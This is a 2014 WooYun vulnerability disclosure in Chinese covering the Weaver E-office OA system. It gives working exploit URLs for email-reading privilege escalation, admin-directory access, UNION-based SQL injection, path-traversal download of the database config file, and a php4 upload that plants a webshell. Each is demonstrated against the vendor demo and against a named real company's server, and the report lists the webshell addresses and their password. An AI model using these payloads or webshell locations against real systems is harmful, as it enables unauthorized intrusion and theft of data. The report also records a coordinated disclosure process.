当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074972

漏洞标题:泛微OA漏洞集合(sql注入、未授权访问等)

相关厂商:cncert国家互联网应急中心

漏洞作者: Coody

提交时间:2014-09-04 12:00

修复时间:2014-12-03 12:02

公开时间:2014-12-03 12:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-04: 细节已通知厂商并且等待厂商处理中
2014-09-09: 厂商已经确认,细节仅向厂商公开
2014-09-12: 细节向第三方安全合作伙伴开放
2014-11-03: 细节向核心白帽子及相关领域专家公开
2014-11-13: 细节向普通白帽子公开
2014-11-23: 细节向实习白帽子公开
2014-12-03: 细节向公众公开

简要描述:

...

详细说明:

0x00: 想说的一些废话


下面出现的漏洞,据我了解还没有人报过,千万别说又跟什么什么漏洞重复了(点绝对不同)!
WooYun: 泛微E-office OA管理系统# 验证其通用性:SQL注入、任意文件下载、文件上传等漏洞
这里通过(1)官方演示 (2)某一案例 来演示其通用型。
官方测试账户为 夏静,案例测试账户为 程琳。

0x01:平行越权导致查看任意用户邮件信息


问题链接:http://www.xxx.com/general/email/new/index.php?EMAIL_ID=7
问题参数:EMAIL_ID
问题说明:遍历参数EMAIL_ID的值,可查看他人邮件信息
漏洞证明:
(1)官方演示:
http://eoffice8.weaver.cn:8028/general/email/new/index.php?EMAIL_ID=9503

QQ图片20140903235456.jpg


http://eoffice8.weaver.cn:8028/general/email/new/index.php?EMAIL_ID=9504

QQ图片20140903235435.jpg


(2)案例演示:
http://www.sjd-logistics.com:8000/general/email/new/index.php?EMAIL_ID=726155

QQ图片20140903235800.jpg


http://www.sjd-logistics.com:8000/general/email/new/index.php?EMAIL_ID=726152

QQ图片20140903235855.jpg


0x02:纵向越权导致直接操作数据表


问题链接:http://www.xxoo.com/ikernel/admin/
问题说明:登录该OA系统后,可访问ikernel目录,但是系统提示“没有权限操作”,此时可直接访问ikernel/admin/目录,可对表结构及表本身进行操作。
漏洞证明:
(1)官方演示:
有些显示的是乱码或显示不清楚,为方便截图进行了全选操作

QQ图片20140904000512.jpg


QQ图片20140904000603.jpg


QQ图片20140904000631.jpg


(2)案例演示:

QQ图片20140904001020.jpg


QQ图片20140904001037.jpg


QQ图片20140904001049.jpg


0x03:纵向越权导致的SQL注入漏洞


问题链接:http://www.xxx.com/ikernel/admin/IK_TABLE/field/?TABLE_ID=9
问题参数:TABLE_ID
问题说明:这里貌似好多都存在注入,测试中只选取一点。虽gpc为on,但是数字型的不影响。
漏洞证明:
(1)官方演示:
获取数据库当前用户 http://eoffice8.weaver.cn:8028/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20user()

QQ图片20140904001650.jpg


获取当前数据库名称 http://eoffice8.weaver.cn:8028/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20database()

QQ图片20140904001708.jpg


(2)案例演示:
获取数据库当前用户 http://www.sjd-logistics.com:8000/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20user()

QQ图片20140904001852.jpg


获取当前数据库名称 http://www.sjd-logistics.com:8000/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20database()

QQ图片20140904001908.jpg


0x04:文件下载漏洞


问题链接:http://www.xxx.com/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php
问题说明:下载是个zend加密的文件,可在网上进行解密。该文件中包含数据库链接文件。测试发现官方的已不是加密文件。
(1)官方演示:
http://eoffice8.weaver.cn:8028/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php

QQ图片20140904002813.jpg


(2)案例演示:
http://www.sjd-logistics.com:8000/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php

QQ图片20140904002848.jpg


0x05:文件上传导致任意代码执行


问题链接:http://www.xxx.com/general/email/
问题说明:在【内部邮件】-【新建邮件】的附件处,可上传php4文件类型(官方demo中抓包改包可上传php4文件),通过查看源码找到对应的部分文件路径。最后webshell访问路径为 http://www.xxx.com/attachment/源码中找到的部分路径/文件名.php4
(1)官方演示:
得到的webshell地址为:http://eoffice8.weaver.cn:8028/attachment/1915193417/conf1g.php4 密码8

QQ图片20140904003949.jpg


QQ图片20140904004111.jpg


(2)案例演示:
得到的webshell地址为:http://www.sjd-logistics.com:8000/attachment/950753027/conf1g.php4 密码8

QQ图片20140904004308.jpg


QQ图片20140904004359.jpg

漏洞证明:

同上

修复方案:

版权声明:转载请注明来源 Coody@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-09-09 08:51

厂商回复:

最新状态:

暂无